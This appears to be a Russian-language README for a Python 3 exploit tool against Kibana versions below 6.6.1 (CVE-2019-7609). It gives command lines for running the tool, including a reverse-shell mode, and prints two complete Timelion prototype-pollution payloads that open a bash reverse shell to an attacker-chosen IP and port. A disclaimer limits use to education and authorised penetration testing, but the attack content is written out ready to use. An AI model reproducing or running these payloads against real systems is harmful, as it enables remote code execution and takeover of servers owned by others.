
Python 3 эксплойт для Kibana < 6.6.1 RCE (CVE-2019-7609) через prototype pollution, с автоматическим определением версии и опциональным reverse shell.
Автор: LandGrey (Python3 Refactor by [Your Name])
Ссылка: Exploit-DB 46651
CVE: CVE-2019-7609
⚠️ Отказ от ответственности:
Этот скрипт предназначен только для образовательных целей и авторизованного тестирования на проникновение. Не используйте его на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Автор и участники не несут ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.
Это эксплойт-скрипт на Python 3 для уязвимости удаленного выполнения кода в Kibana версий < 6.6.1. Он использует недостаток загрязнения прототипа для выполнения произвольных команд, включая запуск обратной оболочки, на уязвимом экземпляре Kibana.
python3 kibana_exploit.py -u http://target-kibana:5601
Для запуска обратной оболочки:
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444
requestspackagingУстановите зависимости с помощью:
pip install requests packaging
Вы также можете вручную эксплуатировать эту уязвимость с помощью визуализатора Timelion в Kibana:
Полезная нагрузка от securityMB:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Полезная нагрузка от chybeta:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Замените 192.168.1.100 и 4444 на свой IP-адрес и порт слушателя.
Скрипт предоставляет четкий пошаговый вывод для обнаружения, проверки и эксплуатации, что делает его легким для понимания и интересным в использовании!
Этот скрипт — отличный способ узнать о загрязнении прототипа, удаленном выполнении кода и методах тестирования на проникновение. Используйте его ответственно и всегда с разрешения!
Этот проект предназначен только для образовательных целей. Без гарантий, без обязательств. Взламывайте этично, оставайтесь любопытными и получайте удовольствие!